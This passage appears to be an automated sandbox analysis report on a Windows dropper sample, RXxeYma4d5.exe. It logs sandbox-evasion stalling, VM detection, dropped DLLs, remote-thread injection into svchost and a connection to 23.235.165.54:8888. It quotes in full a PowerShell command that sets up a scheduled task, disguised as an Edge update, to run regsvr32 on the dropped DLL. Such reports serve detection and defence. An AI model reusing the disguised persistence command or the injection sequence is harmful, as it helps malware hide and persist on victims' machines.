Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Windows\System32\regsvr32.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-98710

Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 352	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 3592	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 5100	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4988	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4850	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6857	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2725	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Setup_Cow.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-I9R0P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-HU557.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

API coverage: 7.5 %

Source: C:\Windows\System32\regsvr32.exe TID: 2304	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4464	Thread sleep count: 352 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4464	Thread sleep time: -352000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 3368	Thread sleep count: 3592 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 3368	Thread sleep time: -35920s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4464	Thread sleep count: 5100 > 30	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4464	Thread sleep time: -5100000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 4988 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 4850 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep count: 6857 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep count: 2725 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E49960 GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,

5_2_02E49960

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E489F0 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

5_2_02E489F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: regsvr32.exe, 00000005.00000002.2926694272.0000000000C57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: RXxeYma4d5.tmp, 00000001.00000002.1673095579.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RXxeYma4d5.tmp, 00000001.00000002.1673095579.0000000000927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\QmI
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.1804406305.00000282339AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E5C1C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_02E5C1C4

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E48A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,

5_2_02E48A70

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E47BF0 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,

5_2_02E47BF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E515C0 Sleep,SleepEx,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,RegOpenKeyExW,Sleep,SleepEx,RegOpenKeyExW,RegQueryValueExW,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,	5_2_02E515C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E5C1C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_02E5C1C4
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E54CD0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_02E54CD0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 23.235.165.54 8888

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E48EC0 GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread,

5_2_02E48EC0

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E48EC0 GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread,		5_2_02E48EC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E4A410 VirtualAllocEx,TerminateProcess,OpenProcess,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,		5_2_02E4A410

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\regsvr32.exe

Thread register set: 7616 5

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: GetSystemDirectoryA,CreateProcessA,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,GetModuleFileNameA,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe

5_2_02E48EC0

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process created: C:\Users\user\Desktop\RXxeYma4d5.exe "C:\Users\user\Desktop\RXxeYma4d5.exe" /VERYSILENT	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Cow.dll	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:360 c:\users\user\appdata\roaming\setup_cow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{8208a45d-f29a-4a60-cbd5-99028fb966b8}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:360 c:\users\user\appdata\roaming\setup_cow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{8208a45d-f29a-4a60-cbd5-99028fb966b8}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"			Jump to behavior

Source: regsvr32.exe, 00000005.00000003.2019926257.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .2.4 0 min965969Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
Source: regsvr32.exe, 00000005.00000002.2927612383.0000000003040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000005.00000002.2927883605.0000000003F60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .2.4 0 min965969Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager

Source: C:\Windows\System32\regsvr32.exe	Code function: gethostname,gethostbyname,inet_ntoa,inet_ntoa,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetTickCount,_localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,	5_2_02E46790
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoW,GetLocaleInfoW,GetACP,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,	5_2_02E66254
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,	5_2_02E673F4
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,	5_2_02E65BD8
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoW,	5_2_02E66020
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	5_2_02E661E8
Source: C:\Windows\System32\regsvr32.exe	Code function: EnumSystemLocalesA,	5_2_02E66150
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLocaleInfoW,	5_2_02E65CC0
Source: C:\Windows\System32\regsvr32.exe	Code function: GetLastError,free,free,GetLocaleInfoW,GetLocaleInfoW,free,GetLocaleInfoW,	5_2_02E5E590
Source: C:\Windows\System32\regsvr32.exe	Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,	5_2_02E65D50

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
